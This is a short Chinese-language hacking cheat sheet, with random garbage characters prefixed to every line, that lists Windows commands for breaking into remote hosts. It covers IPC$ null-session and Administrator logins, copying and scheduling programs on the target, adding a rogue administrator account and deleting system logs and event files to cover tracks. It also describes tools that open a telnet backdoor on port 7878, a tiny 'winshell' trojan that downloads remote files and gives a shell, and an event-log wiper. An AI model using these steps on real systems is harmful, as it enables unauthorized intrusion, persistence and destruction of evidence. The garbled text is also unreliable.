网管和黑客都必须知道的命令
1#+|RL4o 常用的几条NET命令:
;GOu'34j vE#8&Zq (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
?X\.O-=4X BjTgZ98J (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
8~RJnwF^ H*f2fyC1\ (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
t7V7 TL!5' (64es)B}" (查看远程主机时间) net time \\IP地址
{5%d#|? a{JO8<dlm (定时启动某个程序) at \\IP地址 02:18 readme.exe
RDy&i ;9 ChBA (查看共享) net view \\IP地址
>YF=6zq.` 8uW%jG3/ (查看netbios工作组列表) nbtstat -A IP地址
2_M+o]Z^ }o[<1+W(. (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
q j9q {t|#>UCK (这两条把自己增加到管理员组): net user 用户名 密码 /add
&^ s8V]^ ,jw`9a net localgroup Administrators 用户名 /add
*O[/-
p&7 Zvfy%k (断开连接) net use \\IP地址\ipc$ /delete
O%F*i2I:+k ouFKqRs; 扫尾:
<1*\ ~CX R4k+.hR del C:\winnt\system32\logfiles\*.*
Q uw|KL Vwjic2lGI del C:\winnt\ssytem32\config\*.evt
:mf&,? BxQ,T@ del C:\winnt\system32\dtclog\*.*
u.?jW vcv 3qH1\ del C:\winnt\system32\*.log
`/!FZh< 7d|1T' del C:\winnt\system32\*.txt
i`vy<Dvpz utC^wA5U~ del C:\winnt\*.txt
7&%#bMnw l2dj GZk del C:\winnt\*.log
cF9oo%3 C6@*l~j 一、netsvc.exe
^mC,Z+! tc\ZYCFr 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
FDGG$z?>m !g=b=YK netsvc /list \\IP地址
s&$e}yxVO Zv-1*hhHf netsvc schedule \\IP地址 /query
jWh)bsqI! !)W#|sys& netsvc \\IP地址 schedule /start
[EZ=t k %,ScGQE 二、OpenTelnet.exe
&_hEM~{
+`ov1h 远程启动主机的Telnet服务,并绑定端口到7878,例如:
oJ"D5d, |m@>AbR5dk OpenTelnet \\IP地址 用户名 密码 1 7878
+StsSZ 8?: 2< 然后就可以telnet到主机的7878端口,进入DOS方式下:
+|5 O b D+~*nc ~
g telnet IP地址 7878
e5 zi "~ V*Xr}FE 三、winshell.exe
A 2A_F|f v.u 5% 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
Xrpvq(] C>,> _ p Path (查看winshell主程序的路径信息)
5tLb
o |Sua4~yL( b reBoot (重新启动机器)
3/]FT#l]i y"U)&1 c% d shutDown (关闭机器)
b^ [ z' mh SknyqT s Shell (执行后你就会看到可爱的“C:\>”)
?<8c \ n^[!e"` x eXit (退出本次登录会话,此命令并不终止winshell的运行)
5dD8s-;^T /<(-lbq, CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
87eH~&<1 h/8p2Mrqi 四、3389登陆器,GUI方式登录远程主机的
Vx>Q Ip)u6We>I 五、elsave.exe
)/~o'M3 ]fU&?z# 事件日志清除工具
N#$]W"U @v&